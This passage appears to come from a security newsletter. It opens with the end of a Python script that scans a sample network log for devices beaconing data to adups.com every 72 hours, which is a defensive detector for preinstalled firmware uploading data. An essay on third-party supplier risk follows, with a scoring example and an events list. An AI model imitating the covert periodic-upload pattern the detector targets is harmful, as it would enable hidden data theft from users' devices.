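# irregularly; dev-c is periodic but talks to an unrelated host.
SAMPLE_LOG = """\
2016-11-01T02:10:05 dev-a bigdata.adups.com 18340
2016-11-01T09:30:00 dev-a play.googleapis.com 512
2016-11-04T02:11:40 dev-a bigdata.adups.com 17902
2016-11-07T02:09:58 dev-a bigdata.adups.com 18511
2016-11-10T02:12:03 dev-a bigdata.adups.com 18277
2016-11-01T12:00:00 dev-b bigdata.adups.com 900
2016-11-02T18:45:00 dev-b bigdata.adups.com 950
2016-11-01T03:00:00 dev-c cdn.example.net 4096
2016-11-04T03:00:00 dev-c cdn.example.net 4096
2016-11-07T03:00:00 dev-c cdn.example.net 4096
"""

# Domain suffixes to treat as suspect; adups.com is the domain named in the article.
SUSPECT_SUFFIXES = ("adups.com",)


def parse_log(text):
    """Parse the four-column log format above into (timestamp, device, host, bytes) tuples."""
    records = []
    for line in text.splitlines():
        if not line.strip():
            continue
        ts, device, host, nbytes = line.split()
        records.append((datetime.fromisoformat(ts), device, host.lower(), int(nbytes)))
    return records


def host_matches(host, suffixes):
    """True if host is one of the suffix domains or a subdomain of one."""
    return any(host == s or host.endswith("." + s) for s in suffixes)


def find_periodic_beacons(records, suffixes=SUSPECT_SUFFIXES, period_hours=72,
                          tolerance_hours=2, min_events=3):
    """Return {(device, host): summary} for pairs that contact a suspect host
    at a near-constant interval of period_hours (+/- tolerance_hours)."""
    by_pair = defaultdict(list)
    for ts, device, host, nbytes in records:
        if host_matches(host, suffixes):
            by_pair[(device, host)].append((ts, nbytes))

    findings = {}
    for pair, events in by_pair.items():
        if len(events) < min_events:
            continue  # too few contacts to call the pattern periodic
        events.sort()
        gaps = [(b[0] - a[0]).total_seconds() / 3600 for a, b in zip(events, events[1:])]
        if all(abs(g - period_hours) <= tolerance_hours for g in gaps):
            findings[pair] = {
                "events": len(events),
                "mean_interval_hours": round(mean(gaps), 2),
                "mean_bytes_per_upload": round(mean(n for _, n in events)),
            }
    return findings


if __name__ == "__main__":
    for (device, host), summary in find_periodic_beacons(parse_log(SAMPLE_LOG)).items():
        print(f"{device} -> {host}: {summary}")
```

Periodicity alone is a weak signal, since legitimate update checks are periodic too; the domain list does the real work, and a hit is the cue to pull the handset and inspect its preinstalled system packages rather than proof on its own. The upload size is worth recording alongside the interval: an update check should send a few hundred bytes, not tens of kilobytes.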



Third Party Assurance: Why bother?

Haydn Brooks, Manager at Secgate Ltd.

ABSTRACT

Companies, large and small, rely heavily on their supply chain to run their business. As the number of third parties with access to company and customer data increases, so does the risk of security breaches that have the ability to damage the reputation and sustainability of the business. Third party assurance services can reduce these risks by developing governance and monitoring processes that ensure third parties are managing your data, and their own risk, appropriately. With threats constantly evolving, the need for a quality third party assurance service is increasing.

INTRODUCTION

Third party risk management is expensive. It involves performing security reviews of companies that don't want to be (and don't have the time to be) reviewed. To be successful it requires input from your procurement, legal, information security and internal audit teams, and in order to add any real business value it has to be integrated into a process that produces a real and tangible business outcome. C-level executives have enough on their plate worrying about risks to their own business, let alone other people's businesses. So why bother? The reasons are the same reasons that we hear time and time again: operational, reputational, financial and, if your business sits within the financial sector, compliance risk. In short, a failure of one of your third parties will cost you money, clients and time. At Secgate we like to visualise each one of these four risks by placing them into two main categories – risks to your company's confidentiality (the ability to protect your customers' data and your business's intellectual property) and risks to your company's availability (the ability of your company to maintain the service it provides to its clients).

CONFIDENTIALITY

Customers have to hand out a massive amount of personally identifiable information in order to do anything in this day and age. They therefore trust you, the custodian of their data, to keep it personal. A data breach at one of your suppliers, whether it be a supplier that handles customer credit card information or purely a marketing agency that handles customer names and phone numbers, will erode the trust your customers have in your business. And this will occur whether the breach was malicious or accidental. It will make customers think twice about handing over their personal information to you in the future, and this trust will take time to repair and rebuild. This loss of trust in your business and brand is, in essence, reputational damage. Damaged brands don't do well. Think 2013 and Target's data breach. Target's stock price dropped by approximately 10% in the time after the breach was announced, all because of a third party HVAC (heating, ventilation and air conditioning) supplier that you probably can't name (I know I can't). Could your business recover from a hit of that magnitude to its bottom line?

AVAILABILITY

Outsourcing is one of the most popular pastimes of businesses in this day and age. Entire consultancies specialise in helping companies outsource pretty much any function they have, from HR through to payroll and IT. Companies are even outsourcing their C-suite executives.



And you trust these companies to be able to maintain the same quality and availability that you would come to expect of an in-house service. And why shouldn't you trust them? That's the service you are paying for. But what happens when something happens that means these companies can no longer operate? This category is wider than information security. What happens when the supplier managing your help desk is hit by a flash flood? But that could never happen, could it? Just remember that an inch of snow can bring London to a standstill. Could your company operate without its payroll function? Could your company operate without an IT help desk, or even worse, without any IT capability at all? It's at times like these that strong business continuity and IT disaster recovery (BC/ITDR) plans become a lifesaver. But why should your company have to invoke a business continuity plan and absorb the associated cost? Isn't that the job of the company that suffered the incident? Ensuring that your suppliers have a strong, robust and well thought out business continuity and ITDR capability will reduce the chance that your company ever has to invoke its own business continuity plan, preventing operational and financial impacts and mitigating both operational and financial risk.

SO THIS IS ABOUT TRUST?

No. Third party assurance is not about your company not trusting its suppliers. It's about collaboration. It's about the sharing of best practice. It's about saying that no matter how mature your information security control environment is, let's help each other to improve it. And it's this constant improvement that helps create a robust and resilient economy that can benefit everyone.


FINE, YOU HAVE MY ATTENTION. SO WHAT CAN I DO?

Firstly, you need to ensure that your company knows what it is dealing with. Do you have a comprehensive third party inventory? Do you know what third parties you use, the service each one of those third parties provides and the data that they take from you to provide it? Does your CISO team talk to your procurement team to get this information? Does your procurement team even have the information? Secondly, you need to focus your attention on the suppliers that matter most. Rank your suppliers in order of importance from both a confidentiality and an availability perspective. A supplier may be super-critical when looked at through a confidentiality lens, but bottom of the pile through an availability lens, and should be reviewed accordingly. Your CISO team cannot do this alone. Your procurement and supplier management teams have to be involved.

Thirdly, implement a third party assurance programme. Look at the controls you have in place to mitigate the risk third parties present to your business. Do your third party contracts contain the required clauses (this will involve speaking to your legal team)? Do you check that third parties maintain their information security control environment? Do you check that your third parties are robust enough to recover from incidents and business continuity issues? Combine the criticality of each third party with the results from your third party assurance programme to measure the risk the third party poses to your business. Make the assumption that a strong third party review means a low likelihood of an incident occurring at the third party, and feed the combined score into your business's central risk framework. Finally, compare this risk to your risk appetite – are you happy with the risk posed by the third parties that your company utilises?
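The rank-then-combine step can be made concrete. The following is an added worked example, not Secgate's method or code: it scores a constructed supplier inventory on the two lenses the article uses (confidentiality and availability), multiplies each lens's impact by a likelihood derived from the latest assurance review result, and reports which suppliers exceed a stated risk appetite, so that a supplier that is critical on one lens but negligible on the other shows up for the right reason. The 1 to 4 impact scale, the review-to-likelihood mapping, the supplier names and services, and the appetite threshold are all assumptions, not figures from the article.

```python
from dataclasses import dataclass

# Assumed scales (not from the article): impact 1 (low) .. 4 (critical) on each lens,
# and an assumed mapping from the latest assurance review result to a likelihood score.
# A strong review is taken to mean a low chance of an incident, as the article suggests;
# an unreviewed supplier gets the worst likelihood because nothing is known about it.
LIKELIHOOD = {"strong": 1, "adequate": 2, "weak": 3, "not_reviewed": 4}


@dataclass
class Supplier:
    name: str
    service: str
    confidentiality: int  # impact if this supplier loses or leaks the data it holds for us
    availability: int     # impact if this supplier's service stops
    review: str           # latest third party assurance review outcome


# Constructed, hypothetical supplier inventory for illustration.
SAMPLE_SUPPLIERS = [
    Supplier("Cooling Co", "HVAC maintenance with remote network access", 3, 1, "not_reviewed"),
    Supplier("Outreach Agency", "marketing campaigns (customer names, phone numbers)", 3, 1, "weak"),
    Supplier("Desk Ltd", "outsourced IT help desk", 1, 4, "adequate"),
    Supplier("PayCore", "card payment processing", 4, 4, "strong"),
]


def lens_risk(impact, review):
    """Risk on one lens = impact x likelihood implied by the review result."""
    return impact * LIKELIHOOD[review]


def assess(suppliers, appetite):
    """Score each supplier on both lenses and return those breaching the risk
    appetite on either lens, highest residual risk first."""
    findings = []
    for s in suppliers:
        conf = lens_risk(s.confidentiality, s.review)
        avail = lens_risk(s.availability, s.review)
        breaches = [lens for lens, score in (("confidentiality", conf), ("availability", avail))
                    if score > appetite]
        if breaches:
            findings.append({"supplier": s.name, "service": s.service,
                             "confidentiality_risk": conf, "availability_risk": avail,
                             "breaches": breaches})
    findings.sort(key=lambda f: max(f["confidentiality_risk"], f["availability_risk"]),
                  reverse=True)
    return findings


if __name__ == "__main__":
    for f in assess(SAMPLE_SUPPLIERS, appetite=6):
        print(f"{f['supplier']}: C={f['confidentiality_risk']} A={f['availability_risk']} "
              f"breaches {f['breaches']}")
```

With an appetite of 6 the unreviewed maintenance contractor with network access comes out on top even though it holds no customer data on paper, the help desk provider breaches on availability alone, and the payment processor, despite carrying the highest impact on both lenses, stays within appetite because its last review was strong. That last result is only as good as the assumption behind it, which is why the review cadence for high-impact suppliers should be shorter than for the rest.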



Cyber World Missed an edition? Want to subscribe? Want a hardcopy? Want to contribute? Contact us on cyber@secgate.co.uk



Upcoming Events

RSA CONFERENCE USA, hosted in San Francisco, US, from the 13th to the 17th of February 2017

EUROPEAN INFORMATION SECURITY SUMMIT 2017 (TEISS), hosted in London, UK, from the 21st to the 22nd of February 2017

SC CONGRESS LONDON 2017, hosted in London, UK, on the 23rd of February 2017

WORLD CYBER SECURITY CONGRESS 2017, hosted in London, UK, from the 7th to the 8th of March 2017

CYBER INTELLIGENCE ASIA, hosted in Kuala Lumpur, Malaysia, from the 14th to the 16th of March 2017

CYBERUK 2017, hosted in Liverpool, UK, from the 14th to the 16th of March 2017

EUROPEAN SMART GRID CYBER SECURITY, hosted in London, UK, from the 21st to the 23rd of March 2017
